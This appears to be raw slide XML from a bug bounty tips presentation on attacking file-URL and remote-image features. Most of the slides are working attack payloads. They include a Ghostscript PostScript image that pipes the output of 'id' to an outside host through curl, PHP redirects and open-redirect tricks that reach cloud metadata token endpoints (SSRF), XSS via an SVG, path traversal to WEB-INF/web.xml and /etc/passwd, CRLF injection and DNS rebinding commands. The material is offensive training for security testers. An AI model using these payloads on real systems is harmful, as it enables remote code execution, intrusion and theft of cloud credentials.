          <p:cNvPr id="857" name="Google Shape;857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025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858" name="Google Shape;858;p89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90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64" name="Google Shape;864;p90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90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Reading From Remote Image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866" name="Google Shape;866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7" name="Google Shape;867;p90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="1389075"/>
            <a:ext cx="4973700" cy="3357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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://me.com/file.jpg</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="868" name="Google Shape;868;p90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3205300" y="1581400"/>
            <a:ext cx="4835100" cy="11814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0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root@mine:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat file.jpg</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%!PS</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>userdict /setpagedevice undef</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Save</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Legal</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{null restore} stopped {pop} if</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{legal} stopped {pop} if</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Restore</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mark /OutputFile (%pipe%curl${IFS}me.com/`id`)</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>currentdevice putdeviceprops</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="700">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="869" name="Google Shape;869;p90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870" name="Google Shape;870;p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2675525"/>
            <a:ext cx="421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91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76" name="Google Shape;876;p91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91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Interaction With</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Remote URL 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878" name="Google Shape;878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9" name="Google Shape;879;p91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="1389075"/>
            <a:ext cx="4973700" cy="3357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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://me.com/index.php</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="880" name="Google Shape;880;p91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3205300" y="1581400"/>
            <a:ext cx="4835100" cy="6705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B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root@mine:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat index.php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&lt;?php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header("Location: http://[::]:22/");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?&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="881" name="Google Shape;881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025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882" name="Google Shape;882;p91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92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88" name="Google Shape;888;p92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92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Interaction With Remote URL II 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890" name="Google Shape;890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1" name="Google Shape;891;p92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="1389075"/>
            <a:ext cx="4973700" cy="3357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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://me.com/index.php</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="892" name="Google Shape;892;p92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3205300" y="1581400"/>
            <a:ext cx="4835100" cy="6705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B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root@mine:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat index.php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&lt;?php </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>header("Location: http://169.254.169.254/latest/meta-data/", TRUE, 303);</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="893" name="Google Shape;893;p92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894" name="Google Shape;894;p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350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93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00" name="Google Shape;900;p93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93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Interaction With Remote URL III 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902" name="Google Shape;902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3" name="Google Shape;903;p93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="1389075"/>
            <a:ext cx="4973700" cy="3357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Steps to produce :-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1 -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Try To Set Your Domain e.g. http://me.com As </a:t>
            </a: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00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      Remote URL And Run Wireshark On It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2 -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If There Is Range OR Content-Range Header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3 -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Try To Response With e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bytes </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2M AND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      Upload File Less Than Bytes 2M On http://me.com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4 -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The Company Will Rerequest The Rest Of Bytes 2M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5</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Try To Redirect Second Request To e.g.</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="800">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="904" name="Google Shape;904;p93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905" name="Google Shape;905;p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350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94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There Is SSRF Try To Inject </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://brutelogic.com.br/poc.svg</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get XSS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911" name="Google Shape;911;p94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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://brutelogic.com.br/poc.svg</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="912" name="Google Shape;912;p94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13" name="Google Shape;913;p94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94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915" name="Google Shape;915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6" name="Google Shape;916;p94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917" name="Google Shape;917;p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350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918" name="Google Shape;918;p94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919" name="Google Shape;919;p9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925" y="3073200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95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You Can Embedded Videos From Services e.g. Vimeo , Youtube , Twitter , AND Facebook , Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inject XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> In Their Title AND Description </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get XSS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925" name="Google Shape;925;p95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26" name="Google Shape;926;p95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95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928" name="Google Shape;928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9" name="Google Shape;929;p95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930" name="Google Shape;930;p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1" name="Google Shape;931;p9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36000" y="2675525"/>
            <a:ext cx="4973700" cy="20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96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>
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Open Redirection To Bypass The Blacklist e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.company.com/redirect?url=</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token?alt=json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To Extract Google Metadata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937" name="Google Shape;937;p96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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.company.com/redirect?url=http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token?alt=json</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="938" name="Google Shape;938;p96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39" name="Google Shape;939;p96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96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941" name="Google Shape;941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2" name="Google Shape;942;p96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943" name="Google Shape;943;p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38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944" name="Google Shape;944;p96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945" name="Google Shape;945;p9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925" y="308277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946" name="Google Shape;946;p96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947" name="Google Shape;947;p9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4025" y="3525200"/>
            <a:ext cx="421000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8" name="Google Shape;948;p9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64025" y="39399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949" name="Google Shape;949;p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="387947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97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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DNS Rebinding Technique</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> By Using Tools e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="17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Singularity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rebind.py </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass The Blacklist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955" name="Google Shape;955;p97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Steps to produce :-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2 -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Open Your Terminal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3 -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Write This Command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      </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>./rebind.py --ip1=Blacklist --ip2=Allowed --scheme=PORT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956" name="Google Shape;956;p97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57" name="Google Shape;957;p97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97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959" name="Google Shape;959;p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0" name="Google Shape;960;p97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961" name="Google Shape;961;p9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2938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962" name="Google Shape;962;p97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963" name="Google Shape;963;p9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2925" y="308277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964" name="Google Shape;964;p97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965" name="Google Shape;965;p9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2925" y="3502300"/>
            <a:ext cx="503200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6" name="Google Shape;966;p9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4025" y="39399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967" name="Google Shape;967;p97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="387947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" name="Google Shape;972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4711826"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="973" name="Google Shape;973;p98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-365850" y="4677225"/>
            <a:ext cx="9705900" cy="4974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B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mark Valenzia</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="17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                              </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#BugBounty</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="17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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#BugBountyTip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974" name="Google Shape;974;p98"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3063350" y="4711813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0B5394"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="975" name="Google Shape;975;p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0925" y="4760737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5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Inject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0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jsp/etc/../../WEB-INF/web.xml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To Get </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DB Configuration Files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If There Is LFI</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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266" name="Google Shape;266;p45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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jsp/etc/../../WEB-INF/web.xml</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="Google Shape;267;p45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68" name="Google Shape;268;p45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45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70" name="Google Shape;27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5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72" name="Google Shape;272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350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0" name="Google Shape;980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15650" y="-107600"/>
            <a:ext cx="96120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1" name="Google Shape;981;p99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-365850" y="4677225"/>
            <a:ext cx="9705900" cy="4974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B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>            Hack3rScr0lls</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="17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                              </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#BugBounty</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="17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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#BugBountyTip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982" name="Google Shape;982;p99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3063350" y="4711813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0B5394"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="983" name="Google Shape;983;p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0925" y="4760737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100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4524900" y="132782"/>
            <a:ext cx="195600" cy="206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100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639550" y="339175"/>
            <a:ext cx="441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75">
            <a:no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Thank You</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="9600">
              <a:solidFill>
                <a:srgbClr val="0B5394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90" name="Google Shape;990;p100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="324350" y="2864775"/>
            <a:ext cx="50301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b="1" lang="en">
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="36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Mahmoud M.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="36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Awali</a:t>
            </a:r>
            <a:b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     </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black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@0xAwali</a:t>
            </a:r>
            <a:endParaRPr b="1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991" name="Google Shape;991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450" y="4049201"/>
            <a:ext cx="727375" cy="564475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="992" name="Google Shape;992;p100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6032650" y="0"/>
            <a:ext cx="7983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100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7189175" y="0"/>
            <a:ext cx="7983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100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8345700" y="0"/>
            <a:ext cx="7983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6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Inject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0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://id.burpcollaborator.net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To Get Full Request If There Is SSRF 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278" name="Google Shape;278;p46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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://id.burpcollaborator.net</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="279" name="Google Shape;279;p46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80" name="Google Shape;280;p46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6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82" name="Google Shape;28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6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84" name="Google Shape;284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2675525"/>
            <a:ext cx="4210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46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86" name="Google Shape;286;p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025" y="3091500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46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88" name="Google Shape;288;p4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4025" y="35373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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="387947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90" name="Google Shape;290;p4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22925" y="3939538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7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Append </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> OR </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%0d%0aX:%20 To Your Domain e.g. https://id.burpcollaborator.net# </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Appending Anything After URL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296" name="Google Shape;296;p47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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://id.burpcollaborator.net#</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="Google Shape;297;p47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98" name="Google Shape;298;p47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47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00" name="Google Shape;30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47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02" name="Google Shape;302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3110050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7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04" name="Google Shape;304;p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8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Inject</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> file:///etc/passwd </a:t>
            </a:r>
            <a:r>
